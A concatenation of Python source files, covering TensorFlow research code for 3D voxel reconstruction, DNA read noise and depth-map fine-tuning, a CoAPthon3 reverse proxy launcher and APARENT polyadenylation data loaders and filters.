inputs['matrix_%d' % (k + 1)] = []
for n in xrange(quantity):
selected_views = np.random.choice(num_views, step_size, replace=False)
for k in xrange(step_size):
view_selected = selected_views[k]
inputs['images_%d' %
(k + 1)].append(raw_inputs['images'][n, view_selected, :, :, :])
tf_matrix = self.get_transform_matrix(view_selected)
inputs['matrix_%d' % (k + 1)].append(tf_matrix)
for k in xrange(step_size):
inputs['images_%d' % (k + 1)] = tf.stack(inputs['images_%d' % (k + 1)])
inputs['matrix_%d' % (k + 1)] = tf.stack(inputs['matrix_%d' % (k + 1)])
return inputs
def get_init_fn(self, scopes):
"""Initialization assignment operator function used while training."""
if not self._params.init_model:
return None
is_trainable = lambda x: x in tf.trainable_variables()
var_list = []
for scope in scopes:
var_list.extend(
filter(is_trainable, tf.contrib.framework.get_model_variables(scope)))
init_assign_op, init_feed_dict = slim.assign_from_checkpoint(
self._params.init_model, var_list)
def init_assign_function(sess):
sess.run(init_assign_op, init_feed_dict)
return init_assign_function
def get_train_op_for_scope(self, loss, optimizer, scopes):
"""Train operation function for the given scope used file training."""
is_trainable = lambda x: x in tf.trainable_variables()
var_list = []
update_ops = []
for scope in scopes:
var_list.extend(
filter(is_trainable, tf.contrib.framework.get_model_variables(scope)))
update_ops.extend(tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope))
return slim.learning.create_train_op(
loss,
optimizer,
update_ops=update_ops,
variables_to_train=var_list,
clip_gradient_norm=self._params.clip_gradient_norm)
def write_disk_grid(self,
global_step,
log_dir,
input_images,
gt_projs,
pred_projs,
pred_voxels=None):
"""Function called by TF to save the prediction periodically."""
summary_freq = self._params.save_every
def write_grid(input_images, gt_projs, pred_projs, pred_voxels,
global_step):
"""Native python function to call for writing images to files."""
grid = _build_image_grid(input_images, gt_projs, pred_projs, pred_voxels)
if global_step % summary_freq == 0:
img_path = os.path.join(log_dir, '%s.jpg' % str(global_step))
utils.save_image(grid, img_path)
with open(
os.path.join(log_dir, 'pred_voxels_%s' % str(global_step)),
'w') as fout:
np.save(fout, pred_voxels)
with open(
os.path.join(log_dir, 'input_images_%s' % str(global_step)),
'w') as fout:
np.save(fout, input_images)
return grid
py_func_args = [
input_images, gt_projs, pred_projs, pred_voxels, global_step
]
save_grid_op = tf.py_func(write_grid, py_func_args, [tf.uint8],
                              name='write_grid')[0]
slim.summaries.add_image_summary(
tf.expand_dims(save_grid_op, axis=0), name='grid_vis')
return save_grid_op
def _build_image_grid(input_images, gt_projs, pred_projs, pred_voxels):
"""Build the visualization grid with py_func."""
quantity, img_height, img_width = input_images.shape[:3]
for row in xrange(int(quantity / 3)):
for col in xrange(3):
index = row * 3 + col
input_img_ = input_images[index, :, :, :]
gt_proj_ = gt_projs[index, :, :, :]
pred_proj_ = pred_projs[index, :, :, :]
pred_voxel_ = utils.display_voxel(pred_voxels[index, :, :, :, 0])
pred_voxel_ = utils.resize_image(pred_voxel_, img_height, img_width)
if col == 0:
tmp_ = np.concatenate([input_img_, gt_proj_, pred_proj_, pred_voxel_],
1)
else:
tmp_ = np.concatenate(
[tmp_, input_img_, gt_proj_, pred_proj_, pred_voxel_], 1)
if row == 0:
out_grid = tmp_
else:
out_grid = np.concatenate([out_grid, tmp_], 0)
out_grid = out_grid.astype(np.uint8)
return out_grid
```
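To make the random viewpoint selection in `Im2Vox.preprocess` concrete, here is a plain-NumPy restatement with made-up shapes (illustrative only; the real method works on tensors and also gathers one transform matrix per selected view):
```python
import numpy as np

def select_views(images, step_size):
  """images: [quantity, num_views, H, W, C] -> list of step_size batches."""
  quantity, num_views = images.shape[:2]
  per_step = [[] for _ in range(step_size)]
  for n in range(quantity):
    # Sample step_size distinct viewpoints for every example in the batch.
    selected = np.random.choice(num_views, step_size, replace=False)
    for k in range(step_size):
      per_step[k].append(images[n, selected[k]])
  # One [quantity, H, W, C] stack per step, mirroring the 'images_%d' inputs.
  return [np.stack(batch) for batch in per_step]

views = select_views(np.zeros((4, 24, 64, 64, 3)), step_size=2)
print([v.shape for v in views])  # [(4, 64, 64, 3), (4, 64, 64, 3)]
```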
#### File: research/seq2species/seq2label_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from protos import seq2label_pb2
def get_all_label_values(dataset_info):
"""Retrieves possible values for modeled labels from a `Seq2LabelDatasetInfo`.
Args:
dataset_info: a `Seq2LabelDatasetInfo` message.
Returns:
A dictionary mapping each label name to a tuple of its permissible values.
"""
return {
label_info.name: tuple(label_info.values)
for label_info in dataset_info.labels
}
def construct_seq2label_model_info(hparams, model_type, targets, metadata_path,
batch_size, num_filters,
training_noise_rate):
"""Constructs a Seq2LabelModelInfo proto with the given properties.
Args:
hparams: initialized tf.contrib.training.Hparams object.
model_type: string; descriptive tag indicating type of model, ie. "conv".
targets: list of names of the targets the model is trained to predict.
metadata_path: string; full path to Seq2LabelDatasetInfo text proto used
to initialize the model.
batch_size: int; number of reads per mini-batch.
num_filters: int; number of filters for convolutional model.
training_noise_rate: float; rate [0.0, 1.0] of base-flipping noise injected
      into input read sequences at training time.
Returns:
The Seq2LabelModelInfo proto with the hparams, model_type, targets,
num_filters, batch_size, metadata_path, and training_noise_rate fields
set to the given values.
"""
return seq2label_pb2.Seq2LabelModelInfo(
hparams_string=hparams.to_json(),
model_type=model_type,
targets=sorted(targets),
num_filters=num_filters,
batch_size=batch_size,
metadata_path=metadata_path,
training_noise_rate=training_noise_rate)
def add_read_noise(read, base_flip_probability=0.01):
"""Adds base-flipping noise to the given read sequence.
Args:
read: string; the read sequence to which to add noise.
base_flip_probability: float; probability of a base flip at each position.
Returns:
The given read with base-flipping noise added at the provided
base_flip_probability rate.
"""
base_flips = np.random.binomial(1, base_flip_probability, len(read))
if sum(base_flips) == 0:
return read
read = np.array(list(read))
possible_mutations = np.char.replace(['ACTG'] * sum(base_flips),
read[base_flips == 1], '')
  # Use a list so the fancy-indexed assignment below also works on Python 3,
  # where map() returns an iterator.
  mutations = [np.random.choice(list(m)) for m in possible_mutations]
read[base_flips == 1] = mutations
return ''.join(read)
```
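A quick usage sketch of `add_read_noise` (assumes the module above is importable as `seq2label_utils` with its compiled protos on the path; the read below is made up):
```python
import numpy as np
from seq2label_utils import add_read_noise  # module defined above

np.random.seed(0)
read = 'ACGT' * 25  # a 100-bp read
noisy = add_read_noise(read, base_flip_probability=0.05)
n_flips = sum(1 for a, b in zip(read, noisy) if a != b)
# On average about 5% of positions are substituted with a different base.
print(len(noisy), n_flips)
```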
#### File: research/struct2depth/optimize.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
import random
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
import model
import nets
import reader
import util
gfile = tf.gfile
SAVE_EVERY = 1 # Defines the interval that predictions should be saved at.
SAVE_PREVIEWS = True  # If set, will save image previews of depth predictions.
FIXED_SEED = 8964 # Fixed seed for repeatability.
flags.DEFINE_string('output_dir', None, 'Directory to store predictions. '
'Assumes that regular inference has been executed before '
'and results were stored in this folder.')
flags.DEFINE_string('data_dir', None, 'Folder pointing to preprocessed '
'triplets to fine-tune on.')
flags.DEFINE_string('triplet_list_file', None, 'Text file containing paths to '
'image files to process. Paths should be relative with '
'respect to the list file location. Every line should be '
'of the form [input_folder_name] [input_frame_num] '
'[output_path], where [output_path] is optional to specify '
'a different path to store the prediction.')
flags.DEFINE_string('triplet_list_file_remains', None, 'Optional text file '
'containing relative paths to image files which should not '
'be fine-tuned, e.g. because of missing adjacent frames. '
'For all files listed, the static prediction will be '
'copied instead. File can be empty. If not, every line '
'should be of the form [input_folder_name] '
'[input_frame_num] [output_path], where [output_path] is '
'optional to specify a different path to take and store '
'the unrefined prediction from/to.')
flags.DEFINE_string('model_ckpt', None, 'Model checkpoint to optimize.')
flags.DEFINE_string('ft_name', '', 'Optional prefix for temporary files.')
flags.DEFINE_string('file_extension', 'png', 'Image data file extension.')
flags.DEFINE_float('learning_rate', 0.0001, 'Adam learning rate.')
flags.DEFINE_float('beta1', 0.9, 'Adam momentum.')
flags.DEFINE_float('reconstr_weight', 0.85, 'Frame reconstruction loss weight.')
flags.DEFINE_float('ssim_weight', 0.15, 'SSIM loss weight.')
flags.DEFINE_float('smooth_weight', 0.01, 'Smoothness loss weight.')
flags.DEFINE_float('icp_weight', 0.0, 'ICP loss weight.')
flags.DEFINE_float('size_constraint_weight', 0.0005, 'Weight of the object '
'size constraint loss. Use only with motion handling.')
flags.DEFINE_integer('batch_size', 1, 'The size of a sample batch')
flags.DEFINE_integer('img_height', 128, 'Input frame height.')
flags.DEFINE_integer('img_width', 416, 'Input frame width.')
flags.DEFINE_integer('seq_length', 3, 'Number of frames in sequence.')
flags.DEFINE_enum('architecture', nets.RESNET, nets.ARCHITECTURES,
'Defines the architecture to use for the depth prediction '
'network. Defaults to ResNet-based encoder and accompanying '
'decoder.')
flags.DEFINE_boolean('imagenet_norm', True, 'Whether to normalize the input '
'images channel-wise so that they match the distribution '
'most ImageNet-models were trained on.')
flags.DEFINE_float('weight_reg', 0.05, 'The amount of weight regularization to '
'apply. This has no effect on the ResNet-based encoder '
'architecture.')
flags.DEFINE_boolean('exhaustive_mode', False, 'Whether to exhaustively warp '
'from any frame to any other instead of just considering '
'adjacent frames. Where necessary, multiple egomotion '
'estimates will be applied. Does not have an effect if '
'compute_minimum_loss is enabled.')
flags.DEFINE_boolean('random_scale_crop', False, 'Whether to apply random '
'image scaling and center cropping during training.')
flags.DEFINE_bool('depth_upsampling', True, 'Whether to apply depth '
'upsampling of lower-scale representations before warping to '
'compute reconstruction loss on full-resolution image.')
flags.DEFINE_bool('depth_normalization', True, 'Whether to apply depth '
'normalization, that is, normalizing inverse depth '
'prediction maps by their mean to avoid degeneration towards '
'small values.')
flags.DEFINE_bool('compute_minimum_loss', True, 'Whether to take the '
'element-wise minimum of the reconstruction/SSIM error in '
'order to avoid overly penalizing dis-occlusion effects.')
flags.DEFINE_bool('use_skip', True, 'Whether to use skip connections in the '
'encoder-decoder architecture.')
flags.DEFINE_bool('joint_encoder', False, 'Whether to share parameters '
'between the depth and egomotion networks by using a joint '
'encoder architecture. The egomotion network is then '
'operating only on the hidden representation provided by the '
'joint encoder.')
flags.DEFINE_float('egomotion_threshold', 0.01, 'Minimum egomotion magnitude '
'to apply finetuning. If lower, just forwards the ordinary '
'prediction.')
flags.DEFINE_integer('num_steps', 20, 'Number of optimization steps to run.')
flags.DEFINE_boolean('handle_motion', True, 'Whether the checkpoint was '
'trained with motion handling.')
flags.DEFINE_bool('flip', False, 'Whether images should be flipped as well as '
'resulting predictions (for test-time augmentation). This '
'currently applies to the depth network only.')
FLAGS = flags.FLAGS
flags.mark_flag_as_required('output_dir')
flags.mark_flag_as_required('data_dir')
flags.mark_flag_as_required('model_ckpt')
flags.mark_flag_as_required('triplet_list_file')
def main(_):
"""Runs fine-tuning and inference.
There are three categories of images.
1) Images where we have previous and next frame, and that are not filtered
out by the heuristic. For them, we will use the fine-tuned predictions.
2) Images where we have previous and next frame, but that were filtered out
by our heuristic. For them, we will use the ordinary prediction instead.
3) Images where we have at least one missing adjacent frame. For them, we will
use the ordinary prediction as indicated by triplet_list_file_remains (if
provided). They will also not be part of the generated inference list in
the first place.
Raises:
ValueError: Invalid parameters have been passed.
"""
if FLAGS.handle_motion and FLAGS.joint_encoder:
raise ValueError('Using a joint encoder is currently not supported when '
'modeling object motion.')
if FLAGS.handle_motion and FLAGS.seq_length != 3:
raise ValueError('The current motion model implementation only supports '
'using a sequence length of three.')
if FLAGS.handle_motion and not FLAGS.compute_minimum_loss:
raise ValueError('Computing the minimum photometric loss is required when '
'enabling object motion handling.')
if FLAGS.size_constraint_weight > 0 and not FLAGS.handle_motion:
raise ValueError('To enforce object size constraints, enable motion '
'handling.')
if FLAGS.icp_weight > 0.0:
raise ValueError('ICP is currently not supported.')
if FLAGS.compute_minimum_loss and FLAGS.seq_length % 2 != 1:
raise ValueError('Compute minimum loss requires using an odd number of '
'images in a sequence.')
if FLAGS.compute_minimum_loss and FLAGS.exhaustive_mode:
raise ValueError('Exhaustive mode has no effect when compute_minimum_loss '
'is enabled.')
if FLAGS.img_width % (2 ** 5) != 0 or FLAGS.img_height % (2 ** 5) != 0:
logging.warn('Image size is not divisible by 2^5. For the architecture '
                 'employed, this could cause artefacts from resizing in '
'lower dimensions.')
if FLAGS.output_dir.endswith('/'):
FLAGS.output_dir = FLAGS.output_dir[:-1]
# Create file lists to prepare fine-tuning, save it to unique_file.
unique_file_name = (str(datetime.datetime.now().date()) + '_' +
str(datetime.datetime.now().time()).replace(':', '_'))
unique_file = os.path.join(FLAGS.data_dir, unique_file_name + '.txt')
with gfile.FastGFile(FLAGS.triplet_list_file, 'r') as f:
files_to_process = f.readlines()
files_to_process = [line.rstrip() for line in files_to_process]
files_to_process = [line for line in files_to_process if len(line)]
logging.info('Creating unique file list %s with %s entries.', unique_file,
len(files_to_process))
with gfile.FastGFile(unique_file, 'w') as f_out:
fetches_network = FLAGS.num_steps * FLAGS.batch_size
fetches_saves = FLAGS.batch_size * int(np.floor(FLAGS.num_steps/SAVE_EVERY))
repetitions = fetches_network + 3 * fetches_saves
for i in range(len(files_to_process)):
for _ in range(repetitions):
f_out.write(files_to_process[i] + '\n')
# Read remaining files.
remaining = []
if gfile.Exists(FLAGS.triplet_list_file_remains):
with gfile.FastGFile(FLAGS.triplet_list_file_remains, 'r') as f:
remaining = f.readlines()
remaining = [line.rstrip() for line in remaining]
remaining = [line for line in remaining if len(line)]
logging.info('Running fine-tuning on %s files, %s files are remaining.',
len(files_to_process), len(remaining))
# Run fine-tuning process and save predictions in id-folders.
tf.set_random_seed(FIXED_SEED)
np.random.seed(FIXED_SEED)
random.seed(FIXED_SEED)
flipping_mode = reader.FLIP_ALWAYS if FLAGS.flip else reader.FLIP_NONE
train_model = model.Model(data_dir=FLAGS.data_dir,
file_extension=FLAGS.file_extension,
is_training=True,
learning_rate=FLAGS.learning_rate,
beta1=FLAGS.beta1,
reconstr_weight=FLAGS.reconstr_weight,
smooth_weight=FLAGS.smooth_weight,
ssim_weight=FLAGS.ssim_weight,
icp_weight=FLAGS.icp_weight,
batch_size=FLAGS.batch_size,
img_height=FLAGS.img_height,
img_width=FLAGS.img_width,
seq_length=FLAGS.seq_length,
architecture=FLAGS.architecture,
imagenet_norm=FLAGS.imagenet_norm,
weight_reg=FLAGS.weight_reg,
exhaustive_mode=FLAGS.exhaustive_mode,
random_scale_crop=FLAGS.random_scale_crop,
flipping_mode=flipping_mode,
random_color=False,
depth_upsampling=FLAGS.depth_upsampling,
depth_normalization=FLAGS.depth_normalization,
compute_minimum_loss=FLAGS.compute_minimum_loss,
use_skip=FLAGS.use_skip,
joint_encoder=FLAGS.joint_encoder,
build_sum=False,
shuffle=False,
input_file=unique_file_name,
handle_motion=FLAGS.handle_motion,
size_constraint_weight=FLAGS.size_constraint_weight,
train_global_scale_var=False)
failed_heuristic_ids = finetune_inference(train_model, FLAGS.model_ckpt,
FLAGS.output_dir + '_ft')
logging.info('Fine-tuning completed, %s files were filtered out by '
'heuristic.', len(failed_heuristic_ids))
for failed_id in failed_heuristic_ids:
failed_entry = files_to_process[failed_id]
remaining.append(failed_entry)
logging.info('In total, %s images were fine-tuned, while %s were not.',
len(files_to_process)-len(failed_heuristic_ids), len(remaining))
# Copy all results to have the same structural output as running ordinary
# inference.
for i in range(len(files_to_process)):
if files_to_process[i] not in remaining: # Use fine-tuned result.
elements = files_to_process[i].split(' ')
source_file = os.path.join(FLAGS.output_dir + '_ft', FLAGS.ft_name +
'id_' + str(i),
str(FLAGS.num_steps).zfill(10) +
('_flip' if FLAGS.flip else ''))
if len(elements) == 2: # No differing mapping defined.
target_dir = os.path.join(FLAGS.output_dir + '_ft', elements[0])
target_file = os.path.join(
target_dir, elements[1] + ('_flip' if FLAGS.flip else ''))
else: # Other mapping for file defined, copy to this location instead.
target_dir = os.path.join(
FLAGS.output_dir + '_ft', os.path.dirname(elements[2]))
target_file = os.path.join(
target_dir,
os.path.basename(elements[2]) + ('_flip' if FLAGS.flip else ''))
if not gfile.Exists(target_dir):
gfile.MakeDirs(target_dir)
logging.info('Copy refined result %s to %s.', source_file, target_file)
gfile.Copy(source_file + '.npy', target_file + '.npy', overwrite=True)
gfile.Copy(source_file + '.txt', target_file + '.txt', overwrite=True)
gfile.Copy(source_file + '.%s' % FLAGS.file_extension,
target_file + '.%s' % FLAGS.file_extension, overwrite=True)
for j in range(len(remaining)):
elements = remaining[j].split(' ')
if len(elements) == 2: # No differing mapping defined.
target_dir = os.path.join(FLAGS.output_dir + '_ft', elements[0])
target_file = os.path.join(
target_dir, elements[1] + ('_flip' if FLAGS.flip else ''))
else: # Other mapping for file defined, copy to this location instead.
target_dir = os.path.join(
FLAGS.output_dir + '_ft', os.path.dirname(elements[2]))
target_file = os.path.join(
target_dir,
os.path.basename(elements[2]) + ('_flip' if FLAGS.flip else ''))
if not gfile.Exists(target_dir):
gfile.MakeDirs(target_dir)
source_file = target_file.replace('_ft', '')
logging.info('Copy unrefined result %s to %s.', source_file, target_file)
gfile.Copy(source_file + '.npy', target_file + '.npy', overwrite=True)
gfile.Copy(source_file + '.%s' % FLAGS.file_extension,
target_file + '.%s' % FLAGS.file_extension, overwrite=True)
logging.info('Done, predictions saved in %s.', FLAGS.output_dir + '_ft')
def finetune_inference(train_model, model_ckpt, output_dir):
"""Train model."""
vars_to_restore = None
if model_ckpt is not None:
vars_to_restore = util.get_vars_to_save_and_restore(model_ckpt)
ckpt_path = model_ckpt
pretrain_restorer = tf.train.Saver(vars_to_restore)
sv = tf.train.Supervisor(logdir=None, save_summaries_secs=0, saver=None,
summary_op=None)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
img_nr = 0
failed_heuristic = []
with sv.managed_session(config=config) as sess:
# TODO(casser): Caching the weights would be better to avoid I/O bottleneck.
while True: # Loop terminates when all examples have been processed.
if model_ckpt is not None:
logging.info('Restored weights from %s', ckpt_path)
pretrain_restorer.restore(sess, ckpt_path)
logging.info('Running fine-tuning, image %s...', img_nr)
img_pred_folder = os.path.join(
output_dir, FLAGS.ft_name + 'id_' + str(img_nr))
if not gfile.Exists(img_pred_folder):
gfile.MakeDirs(img_pred_folder)
step = 1
# Run fine-tuning.
while step <= FLAGS.num_steps:
logging.info('Running step %s of %s.', step, FLAGS.num_steps)
fetches = {
'train': train_model.train_op,
'global_step': train_model.global_step,
'incr_global_step': train_model.incr_global_step
}
_ = sess.run(fetches)
if step % SAVE_EVERY == 0:
# Get latest prediction for middle frame, highest scale.
pred = train_model.depth[1][0].eval(session=sess)
if FLAGS.flip:
pred = np.flip(pred, axis=2)
input_img = train_model.image_stack.eval(session=sess)
input_img_prev = input_img[0, :, :, 0:3]
input_img_center = input_img[0, :, :, 3:6]
input_img_next = input_img[0, :, :, 6:]
img_pred_file = os.path.join(
img_pred_folder,
str(step).zfill(10) + ('_flip' if FLAGS.flip else '') + '.npy')
motion = np.squeeze(train_model.egomotion.eval(session=sess))
# motion of shape (seq_length - 1, 6).
motion = np.mean(motion, axis=0) # Average egomotion across frames.
if SAVE_PREVIEWS or step == FLAGS.num_steps:
# Also save preview of depth map.
color_map = util.normalize_depth_for_display(
np.squeeze(pred[0, :, :]))
visualization = np.concatenate(
(input_img_prev, input_img_center, input_img_next, color_map))
motion_s = [str(m) for m in motion]
s_rep = ','.join(motion_s)
with gfile.Open(img_pred_file.replace('.npy', '.txt'), 'w') as f:
f.write(s_rep)
util.save_image(
img_pred_file.replace('.npy', '.%s' % FLAGS.file_extension),
visualization, FLAGS.file_extension)
with gfile.Open(img_pred_file, 'wb') as f:
np.save(f, pred)
# Apply heuristic to not finetune if egomotion magnitude is too low.
ego_magnitude = np.linalg.norm(motion[:3], ord=2)
heuristic = ego_magnitude >= FLAGS.egomotion_threshold
if not heuristic and step == FLAGS.num_steps:
failed_heuristic.append(img_nr)
step += 1
img_nr += 1
return failed_heuristic
if __name__ == '__main__':
app.run(main)
```
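A small NumPy restatement of the egomotion heuristic applied at the end of `finetune_inference`: egomotion is averaged over the frame pairs of the sequence, and if the translation magnitude stays below `--egomotion_threshold` the image keeps its unrefined prediction (illustrative values only):
```python
import numpy as np

def passes_egomotion_heuristic(egomotion, threshold=0.01):
  """egomotion: array of shape (seq_length - 1, 6), translation in [:3]."""
  mean_motion = np.mean(egomotion, axis=0)  # average over adjacent frame pairs
  return np.linalg.norm(mean_motion[:3], ord=2) >= threshold

static = np.zeros((2, 6))                        # camera barely moved
moving = np.array([[0.05, 0.0, 0.2, 0., 0., 0.]] * 2)
print(passes_egomotion_heuristic(static))   # False -> keep ordinary prediction
print(passes_egomotion_heuristic(moving))   # True  -> use fine-tuned prediction
```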
#### File: tcn/utils/progress.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
class Progress(object):
"""A utility class for reporting processing progress."""
def __init__(self, target_size):
self.target_size = target_size
self.current_size = 0
self.start_time = datetime.datetime.now()
def Update(self, current_size):
"""Replaces internal current_size with current_size."""
self.current_size = current_size
def Add(self, size):
"""Increments internal current_size by size."""
self.current_size += size
def __str__(self):
processed = 1e-5 + self.current_size / float(self.target_size)
current_time = datetime.datetime.now()
elapsed = current_time - self.start_time
eta = datetime.timedelta(
seconds=elapsed.total_seconds() / processed - elapsed.total_seconds())
return "%d / %d (elapsed %s eta %s)" % (
self.current_size, self.target_size,
str(elapsed).split(".")[0],
str(eta).split(".")[0])
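# Usage sketch (illustrative): track a fixed-size workload and print the ETA.
if __name__ == "__main__":
  import time
  progress = Progress(target_size=100)
  for _ in range(100):
    time.sleep(0.01)   # stand-in for real work
    progress.Add(1)    # or progress.Update(absolute_count)
  print(progress)      # e.g. "100 / 100 (elapsed 0:00:01 eta 0:00:00)"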
``` |
{
"source": "8749236/CoAPthon3",
"score": 3
} |
#### File: 8749236/CoAPthon3/coapreverseproxy.py
```python
import getopt
import sys
from coapthon.reverse_proxy.coap import CoAP
__author__ = '<NAME>'
class CoAPReverseProxy(CoAP):
def __init__(self, host, port, xml_file, multicast=False, cache=False, starting_mid=None):
CoAP.__init__(self, (host, port), xml_file=xml_file, multicast=multicast, starting_mid=starting_mid,
cache=cache)
print(("CoAP Proxy start on " + host + ":" + str(port)))
def usage(): # pragma: no cover
print("coapreverseproxy.py -i <ip address> -p <port> -f <xml_file>")
def main(argv): # pragma: no cover
ip = "0.0.0.0"
port = 5684
file_xml = "reverse_proxy_mapping.xml"
try:
opts, args = getopt.getopt(argv, "hi:p:f:", ["ip=", "port=", "file="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
elif opt in ("-i", "--ip"):
ip = arg
elif opt in ("-p", "--port"):
port = int(arg)
elif opt in ("-f", "--file"):
file_xml = arg
server = CoAPReverseProxy(ip, port, file_xml)
try:
server.listen(10)
except KeyboardInterrupt:
print("Server Shutdown")
server.close()
print("Exiting...")
if __name__ == "__main__": # pragma: no cover
main(sys.argv[1:])
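# Example invocation (illustrative; the values shown are the defaults set in main):
#   python coapreverseproxy.py -i 0.0.0.0 -p 5684 -f reverse_proxy_mapping.xml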
``` |
{
"source": "876lkj/APARENT",
"score": 2
} |
#### File: aparent/data/aparent_data_native_pairs.py
```python
from __future__ import print_function
import keras
from keras import backend as K
import tensorflow as tf
import pandas as pd
import os
import pickle
import numpy as np
import scipy.sparse as sp
import scipy.io as spio
import isolearn.io as isoio
import isolearn.keras as iso
def load_data(batch_size=32, valid_set_size=0.0, test_set_size=1.0, file_path='') :
#Load leslie/apadb pair-wise data
native_dict = isoio.load(file_path + 'apa_leslie_apadb_pair_data')
native_df = native_dict['df_pair']
native_index = np.arange(len(native_df), dtype=np.int)
print('Pair-wise Native APA (APADB + Leslie) size = ' + str(native_index.shape[0]))
native_train_index = native_index[:-int(len(native_df) * (valid_set_size + test_set_size))]
native_valid_index = native_index[native_train_index.shape[0]:-int(len(native_df) * test_set_size)]
native_test_index = native_index[native_train_index.shape[0] + native_valid_index.shape[0]:]
print('Training set size = ' + str(native_train_index.shape[0]))
print('Validation set size = ' + str(native_valid_index.shape[0]))
print('Test set size = ' + str(native_test_index.shape[0]))
#Calculate relative APADB cut start and end positions within each sequence
def get_start_pos_prox(row) :
if row['strand'] == '+' :
return row['cut_start_prox'] - row['pas_pos_prox'] + 70
else :
return row['pas_pos_prox'] - row['cut_end_prox'] + 76
def get_end_pos_prox(row) :
if row['strand'] == '+' :
return row['cut_end_prox'] - row['pas_pos_prox'] + 70
else :
return row['pas_pos_prox'] - row['cut_start_prox'] + 76
def get_start_pos_dist(row) :
if row['strand'] == '+' :
return row['cut_start_dist'] - row['pas_pos_dist'] + 70
else :
return row['pas_pos_dist'] - row['cut_end_dist'] + 76
def get_end_pos_dist(row) :
if row['strand'] == '+' :
return row['cut_end_dist'] - row['pas_pos_dist'] + 70
else :
return row['pas_pos_dist'] - row['cut_start_dist'] + 76
native_df['rel_start_prox'] = native_df.apply(get_start_pos_prox, axis=1)
native_df['rel_end_prox'] = native_df.apply(get_end_pos_prox, axis=1)
native_df['rel_start_dist'] = native_df.apply(get_start_pos_dist, axis=1)
native_df['rel_end_dist'] = native_df.apply(get_end_pos_dist, axis=1)
native_gens = {
gen_id : iso.DataGenerator(
idx,
{'df' : native_df},
batch_size=batch_size,
inputs = [
{
'id' : 'seq_prox',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : iso.SequenceExtractor('wide_seq_ext_prox', start_pos=105, end_pos=105 + 205),
'encoder' : iso.OneHotEncoder(seq_length=205),
'dim' : (205, 4, 1),
'sparsify' : False
},
{
'id' : 'seq_dist',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : iso.SequenceExtractor('wide_seq_ext_dist', start_pos=105, end_pos=105 + 205),
'encoder' : iso.OneHotEncoder(seq_length=205),
'dim' : (205, 4, 1),
'sparsify' : False
},
{
'id' : 'start_prox',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_start_prox'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'end_prox',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_end_prox'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'start_dist',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_start_dist'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'end_dist',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: row['rel_end_dist'],
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'site_distance',
'source' : 'df',
'source_type' : 'dataframe',
'extractor' : lambda row, index: np.log(np.abs(row['cut_start_dist'] - row['cut_start_prox'])),
'transformer' : None,
'dim' : (1,),
'sparsify' : False
},
{
'id' : 'lib',
'source_type' : 'dataframe',
'source' : 'df',
'extractor' : lambda row, index: np.zeros(13),
'encoder' : None,
'sparsify' : False
},
{
'id' : 'distal_pas',
'source_type' : 'dataframe',
'source' : 'df',
'extractor' : lambda row, index: 1,
'encoder' : None,
'sparsify' : False
}
],
outputs = [
{
'id' : 'dummy_output',
'source_type' : 'zeros',
'dim' : (1,),
'sparsify' : False
}
],
randomizers = [],
shuffle = False
) for gen_id, idx in [('all', native_index), ('train', native_train_index), ('valid', native_valid_index), ('test', native_test_index)]
}
return native_gens
```
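A plain-Python restatement of the strand-aware coordinate shift defined by the four `get_*_pos_*` helpers above: APADB cut coordinates are genomic and are re-expressed relative to the extracted sequence using the fixed 70/76 offsets from the code (the example numbers are made up):
```python
def relative_cut_interval(strand, pas_pos, cut_start, cut_end):
  """Maps genomic cut coordinates to positions within the extracted sequence."""
  if strand == '+':
    return cut_start - pas_pos + 70, cut_end - pas_pos + 70
  # On the reverse strand the interval is mirrored around the PAS position
  # (note the start/end swap) and shifted by 76 instead of 70.
  return pas_pos - cut_end + 76, pas_pos - cut_start + 76

# Hypothetical proximal site on the forward strand:
print(relative_cut_interval('+', pas_pos=1000, cut_start=1020, cut_end=1035))
# (90, 105)
```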
#### File: APARENT/data/prepare_aparent_data_helpers.py
```python
import pandas as pd
import numpy as np
import scipy.sparse as sp
import matplotlib.pyplot as plt  # required by the plotting helpers below
#Random MPRA sorting and shuffling functions
class LibraryPreparer :
def __init__(self, preparer_type_id) :
self.preparer_type_id = preparer_type_id
def _prepare(self, library_dict) :
raise NotImplementedError()
class LibraryCountFilter(LibraryPreparer) :
def __init__(self, minimum_count) :
super(LibraryCountFilter, self).__init__('lib_count_filter')
self.minimum_count = minimum_count
def _prepare(self, library_dict) :
keep_index = np.nonzero(library_dict['data']['total_count'] >= self.minimum_count)[0]
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[keep_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][keep_index]
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
class SubLibraryCountFilter(LibraryPreparer) :
def __init__(self, min_count_dict) :
super(SubLibraryCountFilter, self).__init__('sublib_count_filter')
self.min_count_dict = min_count_dict
def _prepare(self, library_dict) :
keep_index = []
i = 0
for _, row in library_dict['data'].iterrows() :
if i % 100000 == 0 :
print("Filtering sequence " + str(i))
if row['library_index'] not in self.min_count_dict :
keep_index.append(i)
elif row['total_count'] >= self.min_count_dict[row['library_index']] :
keep_index.append(i)
i += 1
new_library_dict = { 'metadata' : library_dict['metadata'] }
new_library_dict['data'] = library_dict['data'].iloc[keep_index].reset_index(drop=True)
new_library_dict['cuts'] = library_dict['cuts'][keep_index]
return new_library_dict
def __call__(self, library_dict) :
return self._prepare(library_dict)
class LibrarySelector(LibraryPreparer) :
